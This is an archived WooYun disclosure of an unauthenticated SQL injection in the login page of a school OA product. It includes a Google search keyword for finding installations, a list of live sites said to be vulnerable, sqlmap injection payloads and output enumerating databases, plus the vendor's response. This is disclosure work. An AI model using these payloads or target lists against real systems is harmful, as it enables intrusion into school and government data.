当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061236

漏洞标题:某OA系统无需登陆SQL注入(官网demo证明)

相关厂商:cncert国家互联网应急中心

漏洞作者: xfkxfk

提交时间:2014-05-19 14:44

修复时间:2014-08-17 14:48

公开时间:2014-08-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-19: 细节已通知厂商并且等待厂商处理中
2014-05-24: 厂商已经确认,细节仅向厂商公开
2014-05-27: 细节向第三方安全合作伙伴开放
2014-07-18: 细节向核心白帽子及相关领域专家公开
2014-07-28: 细节向普通白帽子公开
2014-08-07: 细节向实习白帽子公开
2014-08-17: 细节向公众公开

简要描述:

某OA系统某处无需登陆SQL注入,官网demo中招
使用此OA的都是学校和教育部门,用户量很多,影响范围不小

详细说明:

广州市颖峰信息科技有限公司
http://www.yfidea.com/product.asp
官方demo地址:
http://demo.yfidea.com/
官方成功案例:
http://www.yfidea.com/AnLi.asp
Google搜索案例:
Google关键字:技术支持:创想颖峰
搜索结果:43,400
从官网和搜索结果中看,用户还是很多的。
http://oa.bh5z.net/Index.asp
http://222.178.145.174:8000/Index.asp
http://oa.gz65.com/
http://hsoa.bgyhs.net/
http://www.xmqwzx.com/Index.asp
http://oa.lhljzx.com/
......
这些都是存在注入的案例。
此OA系统在登录处,UserName存在注入漏洞。
http://demo.yfidea.com/login.asp?username=123&submit2=+&Password=123

漏洞证明:

官方demo地址:http://demo.yfidea.com/

---
Place: GET
Parameter: username
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=123'; WAITFOR DELAY '0:0:5'--&submit2= &Password=123
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=123' WAITFOR DELAY '0:0:5'--&submit2= &Password=123
---
[02:19:04] [INFO] testing Microsoft SQL Server
[02:19:04] [INFO] confirming Microsoft SQL Server
[02:19:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[02:19:04] [INFO] fetching database names
[02:19:04] [INFO] fetching number of databases
[02:19:04] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[02:19:04] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[02:19:19] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
7
[02:19:30] [INFO] retrieved:
[02:19:41] [INFO] adjusting time delay to 1 second due to good response times
master
[02:20:32] [INFO] retrieved: model
[02:21:26] [INFO] retrieved: msdb
[02:22:03] [INFO] retrieved: Northwind
[02:23:37] [INFO] retrieved: pubs
[02:24:18] [INFO] retrieved: tempdb
[02:25:18] [INFO] retrieved: YFWebOA
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YFWebOA


Google搜索案例:http://oa.bh5z.net/

---
Place: GET
Parameter: username
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=123' AND 4825=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR
(116)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4825=4825) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(121)+CHAR(113))) AND 'KFPk'='KFPk&
submit2= &Password=123
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: username=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+C
HAR(121)+CHAR(116)+CHAR(107)+CHAR(113)+CHAR(86)+CHAR(115)+CHAR(88)+CHAR(66)+CHAR
(118)+CHAR(97)+CHAR(116)+CHAR(74)+CHAR(75)+CHAR(106)+CHAR(113)+CHAR(121)+CHAR(11
2)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &submit2= &Password=123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=123'; WAITFOR DELAY '0:0:5'--&submit2= &Password=123
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=123' WAITFOR DELAY '0:0:5'--&submit2= &Password=123
---
[02:22:11] [INFO] testing Microsoft SQL Server
[02:22:12] [INFO] confirming Microsoft SQL Server
[02:22:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[02:22:12] [INFO] fetching database names
[02:22:12] [INFO] the SQL query used returns 7 entries
[02:22:13] [INFO] retrieved: "master"
[02:22:13] [INFO] retrieved: "model"
[02:22:13] [INFO] retrieved: "msdb"
[02:22:13] [INFO] retrieved: "Northwind"
[02:22:13] [INFO] retrieved: "pubs"
[02:22:13] [INFO] retrieved: "tempdb"
[02:22:14] [INFO] retrieved: "YFWebOA"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YFWebOA

修复方案:

过滤

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-24 12:41

厂商回复:

CNVD确认并复现所述案例情况,先由CNVD通过公开联系渠道向软件生产厂商通报,对方确认测试网站修复。后续又下发给广东分中心继续跟踪处置,软件生产厂商反馈3.93版本已经修复。广东分中心经过仔细检测,确认仍然存在相关漏洞,目前仍然在进一步协调中。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-19 14:48 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    我真的搞不懂,为什么你就审核的那么快?

  2. 2014-05-19 14:50 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)

    @U神 周六的

  3. 2014-05-19 14:52 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @xfkxfk 我周五的都没有给审呢